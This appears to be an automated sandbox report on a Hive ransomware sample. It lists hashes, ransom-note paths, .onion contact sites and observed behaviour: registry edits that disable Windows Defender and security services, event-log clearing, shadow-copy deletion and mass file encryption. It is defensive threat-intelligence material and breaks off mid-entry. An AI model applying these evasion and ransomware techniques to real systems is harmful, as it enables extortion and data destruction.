Analysis
-
max time kernel
147s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
12/03/2025, 02:06
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe
Resource
win10v2004-20250217-en
General
-
Target
2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe
-
Size
3.1MB
-
MD5
f5d7efaec3c1274b0aaa704a6caa1671
-
SHA1
ec5c25e1cee1dca5c75baf5a6e3bec69441959dc
-
SHA256
5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d
-
SHA512
dab0a8060e9012706ae6ba46adeb2f18e5edecdc187e856989236dd0edb46ed7912cee97cee1c9fb075724c5d736b07e418991d1a3793bee6770d51618dd607f
-
SSDEEP
49152:imfcJ4D5NnqxkGcfxPxZHPlCJKC732T4rOB3IJ2LL8JcL8LBetlyQ1D11:imfcO1Nq6GcfRdF
Malware Config
Extracted
C:\Program Files\Common Files\DESIGNER\GyDM_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Disables service(s) 3 TTPs
-
Hive
A ransomware written in Golang first seen in June 2021.
-
Hive family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 4544 wevtutil.exe 848 wevtutil.exe 6076 wevtutil.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
pid Process 3672 powershell.exe 5516 powershell.exe -
Modifies Security services 2 TTPs 6 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jre-1.8\lib\jvm.hprof.txt.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_IpuWrKBxs3k0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\da\msipc.dll.mui.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_UysjEoOOySw0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSmallTile.contrast-white_scale-200.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\LTR\contrast-black\LargeTile.scale-200.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\new_icons_retina.png.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_SKhHcPAzE9I0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\digsig_icons_2x.png.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_-xtdfpOtkGg0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\GyDM_HOW_TO_DECRYPT.txt 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\Assets\tinytile.targetsize-48_contrast-white.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\client_eula.txt.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_GLz0uDKgwA00.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe.config.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_HzX0xx9BjUM0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\de\msipc.dll.mui.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_Plt4FHzv8_Q0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-96_altform-unplated.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SplashWideTile.scale-100_contrast-black.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\SplashScreen.scale-150.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\ko-KR\View3d\3DViewerProductDescription-universal.xml 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_OEM_Perp-ppd.xrm-ms.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_85DNk54wmyM0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sqlpdw.xsl.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_3qLcH-xQ3EU0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_lQRKi-nDL-s0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Square44x44Logo.scale-150.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Win10\Classic\Spider.Large.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\TimeAppService.winmd 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-focus.svg.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_MPpmkZRcrCc0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\dd_arrow_small.png.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_kgTGr1wSmlQ0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\resources.pri 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Advanced-Dark.scale-250.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\root\ui-strings.js.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_KY8dAel74sg0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\de-de\GyDM_HOW_TO_DECRYPT.txt 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-ae\GyDM_HOW_TO_DECRYPT.txt 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\es-ES\tabskb.dll.mui 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri.xml.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_xtS9hjcR2r00.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_OEM_Perp-ul-oob.xrm-ms.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_uR5KoFId4jY0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeBadge.scale-400.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\Microsoft.NETCore.App.runtimeconfig.json.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_sH5DASgfKpw0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_en_135x40.svg.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_wNzN40YNKGU0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\ink\fr-FR\InkObj.dll.mui 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-32_altform-unplated_contrast-black.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\ha-Latn-NG\View3d\3DViewerProductDescription-universal.xml 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-white_targetsize-256.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xea22.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-30_altform-unplated.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_MAK_AE-pl.xrm-ms.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_VzlErprvPyk0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-20_altform-unplated.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageWideTile.scale-125_contrast-white.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-72_altform-lightunplated.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\directshow.md.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_QdqtfGOyF1Y0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ul-phn.xrm-ms.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_n2v-lhtqxXI0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\Programmer.targetsize-32_contrast-black.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ar-ae\GyDM_HOW_TO_DECRYPT.txt 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-ma\GyDM_HOW_TO_DECRYPT.txt 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql70.xsl.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_AlaF92OkSAc0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\AppxManifest.xml 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\View3D.ResourceResolver.exe.config 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNewNoteSmallTile.scale-125.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\GyDM_HOW_TO_DECRYPT.txt 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\LockScreenLogo.scale-125.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-30_altform-unplated_contrast-black.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-white_targetsize-48_altform-unplated.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen-press.svg.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_Xpka8rRZLek0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ro-ro\GyDM_HOW_TO_DECRYPT.txt 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\7-Zip\Lang\zh-cn.txt.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_LdVM-t3bSok0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBOB6.CHM.nD89NAmCveT2sb6lLdfUMB4_04QfMAudIVyQpTrE7eP_78STQNfke4A0.jhps7 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\AppCS\MemMDL2.1.85.ttf 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Exchange.scale-400.png 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2572 sc.exe 4876 sc.exe 1484 sc.exe 3636 sc.exe 2540 sc.exe 1924 sc.exe 4936 sc.exe 3680 sc.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened 